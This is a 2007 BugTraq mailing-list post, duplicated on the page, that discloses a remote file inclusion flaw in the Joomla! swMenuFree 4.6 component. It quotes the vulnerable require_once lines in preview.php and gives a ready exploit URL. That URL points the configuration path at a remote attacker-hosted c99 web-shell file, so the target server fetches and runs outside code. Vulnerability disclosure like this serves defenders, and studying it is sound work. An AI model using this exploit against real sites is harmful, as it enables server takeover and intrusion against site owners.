BugTraq
Back to list
|
Post reply
Joomla! swMenuFree 4.6 Component Remote File Include
Oct 11 2007 04:41PM
Guns 0x90 com ar
#Joomla! swMenuFree 4.6 Component Remote File Include
#Found by 0x90
#WwW.0x90.CoM.Ar
#Download: http://www.swmenupro.com/index.php?option=com_remository&Itemid=298&func
=fileinfo&id=12
#dork: No dork for script kiddies.. :)
#BUG:
preview.php:12: require_once($mosConfig_absolute_path ."/modules/mod_swmenufree/styles.php"); // <-- RFI
preview.php:13: require_once($mosConfig_absolute_path ."/modules/mod_swmenufree/functions.php"); // <-- RFI
#Expl0it:
http://www.site.com/components/com_swmenufree/preview.php?mosConfig_abso
lute_path=http://scriptkiddie.com/c99haxor.txt?
#Contact: Guns [at] 0x90 [dot] com [dot] ar
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
#Found by 0x90
#WwW.0x90.CoM.Ar
#Download: http://www.swmenupro.com/index.php?option=com_remository&Itemid=298&func
=fileinfo&id=12
#dork: No dork for script kiddies.. :)
#BUG:
preview.php:12: require_once($mosConfig_absolute_path ."/modules/mod_swmenufree/styles.php"); // <-- RFI
preview.php:13: require_once($mosConfig_absolute_path ."/modules/mod_swmenufree/functions.php"); // <-- RFI
#Expl0it:
http://www.site.com/components/com_swmenufree/preview.php?mosConfig_abso
lute_path=http://scriptkiddie.com/c99haxor.txt?
#Contact: Guns [at] 0x90 [dot] com [dot] ar
[ reply ]